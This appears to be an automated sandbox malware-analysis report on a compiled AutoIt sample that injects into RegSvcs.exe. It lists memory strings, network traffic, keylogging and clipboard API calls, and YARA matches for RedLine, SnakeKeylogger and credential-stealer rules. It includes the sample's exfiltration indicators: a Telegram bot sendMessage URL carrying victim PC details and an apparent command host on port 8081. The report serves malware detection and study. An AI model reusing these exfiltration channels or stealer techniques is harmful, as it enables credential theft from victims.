Source: RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20a
Source: RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://certs.starfieldtech.com/repository/0
Source: RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.4513561000.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.4513561000.00000000032AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enDze
Source: RegSvcs.exe, 00000002.00000002.4513561000.00000000032A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBcq
Source: RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.4513561000.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003183000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000002.00000002.4513561000.0000000003183000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000002.00000002.4513561000.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.00000000031AC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000002.00000002.4516159706.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000002.00000002.4513561000.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000002.00000002.4513561000.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/Dze
Source: RegSvcs.exe, 00000002.00000002.4513561000.00000000032D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBcq

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_00414164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00414164

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_00414164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00414164

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_00413F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00413F66

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_0040001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0040001C

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_0042CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0042CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.n0nsAzvYNd.exe.340000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.2054161886.0000000000340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.4511931022.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 4148, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: This is a third-party compiled AutoIt script.	0_2_003A3B3A
Source: n0nsAzvYNd.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: n0nsAzvYNd.exe, 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d54941cb-2
Source: n0nsAzvYNd.exe, 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_6db6fecf-0
Source: n0nsAzvYNd.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6070ed7c-0
Source: n0nsAzvYNd.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_069e852a-9

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_0040A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0040A1EF

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003F8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_003F8310

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_004051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004051BD

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003CD975	0_2_003CD975
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003C21C5	0_2_003C21C5
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003D62D2	0_2_003D62D2
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_004203DA	0_2_004203DA
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003D242E	0_2_003D242E
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003C25FA	0_2_003C25FA
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003FE616	0_2_003FE616
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003AE6A0	0_2_003AE6A0
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003B66E1	0_2_003B66E1
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003D878F	0_2_003D878F
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_00420857	0_2_00420857
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003B8808	0_2_003B8808
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003D6844	0_2_003D6844
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_00408889	0_2_00408889
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003CCB21	0_2_003CCB21
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003D6DB6	0_2_003D6DB6
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003B6F9E	0_2_003B6F9E
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003B3030	0_2_003B3030
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003C3187	0_2_003C3187
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003CF1D9	0_2_003CF1D9
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003A1287	0_2_003A1287
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003C1484	0_2_003C1484
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003B5520	0_2_003B5520
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003C7696	0_2_003C7696
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003B5760	0_2_003B5760
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003C1978	0_2_003C1978
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003D9AB5	0_2_003D9AB5
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003AFCE0	0_2_003AFCE0
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_00427DDB	0_2_00427DDB
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003CBDA6	0_2_003CBDA6
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003C1D90	0_2_003C1D90
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003ADF00	0_2_003ADF00
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003B3FE0	0_2_003B3FE0
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_01010460	0_2_01010460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040DC11	2_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00407C3F	2_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418CCC	2_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00406CA0	2_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004028B0	2_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041A4BE	2_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418244	2_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00401650	2_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004193C4	2_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418788	2_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402F89	2_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402B90	2_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004073A0	2_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02D712C0	2_2_02D712C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02D712B3	2_2_02D712B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02D7154F	2_2_02D7154F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02D71560	2_2_02D71560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566B5E0	2_2_0566B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566C43F	2_2_0566C43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566C160	2_2_0566C160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_056641E3	2_2_056641E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566B300	2_2_0566B300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_05669318	2_2_05669318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_05665FA8	2_2_05665FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566AE58	2_2_0566AE58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566BEAA	2_2_0566BEAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_05665820	2_2_05665820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566B8C0	2_2_0566B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566D890	2_2_0566D890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566BBA1	2_2_0566BBA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566F4C8	2_2_0566F4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566B020	2_2_0566B020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566F924	2_2_0566F924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566E9E8	2_2_0566E9E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566E9D8	2_2_0566E9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0566D881	2_2_0566D881

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: String function: 003C8900 appears 42 times
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: String function: 003A7DE1 appears 35 times
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: String function: 003C0AE3 appears 70 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times

Source: n0nsAzvYNd.exe, 00000000.00000002.2054161886.0000000000340000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs n0nsAzvYNd.exe
Source: n0nsAzvYNd.exe, 00000000.00000003.2051488173.0000000003533000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs n0nsAzvYNd.exe
Source: n0nsAzvYNd.exe, 00000000.00000003.2051211063.00000000036DD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs n0nsAzvYNd.exe

Source: n0nsAzvYNd.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.n0nsAzvYNd.exe.340000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
